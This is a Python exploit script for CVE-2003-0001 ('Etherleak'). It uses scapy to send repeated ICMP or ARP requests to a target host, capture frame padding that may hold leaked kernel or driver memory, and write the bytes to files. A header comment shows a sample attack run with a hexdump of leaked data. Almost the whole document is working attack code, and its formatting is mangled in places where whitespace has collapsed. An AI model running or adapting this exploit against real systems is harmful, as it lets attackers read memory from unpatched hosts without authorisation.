#!/usr/bin/env python# CVE-2003-0001 'Etherleak' exploit# =================================# Exploit for hosts which use a network device driver that pads # ethernet frames with data which vary from one packet to another, # likely taken from kernel memory, system memory allocated to # the device driver, or a hardware buffer on its network interface # card. Exploit uses scapy with either ICMP or ARP requests as # this can trigger with either but ICMP can hit layer3 filtering # rules. Using ARP the padding appears to leak only fixed constant # values when exploited, ICMP leaks random bytes. ## root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky# WARNING: No route found for IPv6 destination :: (no default route?)# [ CVE-2003-0001 'Etherleak' exploit# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex# ............................................................^C!Killing# !Killing# root@bt:~/0d# hexdump -C leaky | head# 00000000e6 bd a6 9b 90 eb 44 f518 a5 29 2a 16 5a 08 ff|......D...)*.Z..|# 0000001043 e1 23 07 8f 96 5a 243f 3d 33 7d b4 97 7e 18|C.#...Z$?=3}..~.|# 0000002005 c9 7c 2c a5 c0 fa 7a76 f3 51 c0 fe 07 72 32|..|,...zv.Q...r2|# 000000309e ad 6a 67 ad 43 58 1760 43 bc 2b b8 fb cc 70|..jg.CX.`C.+...p|# 0000004099 92 80 84 03 03 6f 8f18 d3 5b 5e f0 1e 3a 83|......o...[^..:.|# 000000503d 82 e7 cd 3e 1f 31 74b0 06 8c a2 7e 14 6b fb|=...>.1t....~.k.|# 0000006072 9b ac 64 74 9b a4 d923 5b 92 82 0d 0b 31 f0|r..dt...#[....1.|# 00000070a9 4f dd 3f bf 2b 5c 676c 22 fa da d0 2b d6 39|.O.?.+\gl"...+.9|# 0000008040 58 13 4f 3d bb 48 03d3 53 3c 5c 44 d2 3d b2|@X.O=.H..S<\D.=.|# 000000904f f2 a9 4a 02 80 4e 1b6c bd 69 89 bd 76 1b 0a|O..J..N.l.i..v..|## This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference# is CSCua88376 and PSIRT-0669464365.##-- prdelka#import os
import sys
import signal
import binascii
from scapy.allimport*defsignalhandler(signal,id):print"!Killing"
sys.exit(0)defspawn(host,type):iftype=='arp':
send(ARP(pdst=host),loop=1,nofilter=1)eliftype=='icmp':
send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)if __name__ =="__main__":print"[ CVE-2003-0001 'Etherleak' exploit"
signal.signal(signal.SIGINT,signalhandler)iflen(sys.argv)<4:print"[ No! Use with <host> <arp|icmp> <file>"
sys.exit(1)type= sys.argv[2]iftype=='arp':passeliftype=='icmp':passelse:print"Bad type!"
sys.exit(0)
pid = os.fork()if(pid):print"[ Attacking %s for %s padding saved to %s.hex"%(sys.argv[1],sys.argv[2],sys.argv[3])
spawn(sys.argv[1],sys.argv[2])whileTrue:iftype=='arp':
myfilter ="host %s and arp"% sys.argv[1]eliftype=='icmp':
myfilter ="host %s and icmp"% sys.argv[1]
x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
p = x[0]iftype=='arp':
pad = p.getlayer(2)iftype=='icmp':
pad = p.getlayer(4)
leak =str(pad)
hexfull = binascii.b2a_hex(leak)file="%s.hex"%sys.argv[3]
fdesc =open(file,"a")
fdesc.write(hexfull +"\n")
fdesc.close()# 32 bits leaked here for me.iftype=='icmp':bytes= leak[9:13]eliftype=='arp':bytes= leak[10:14]
fdesc =open(sys.argv[3],"ab")
fdesc.write(bytes)
fdesc.close()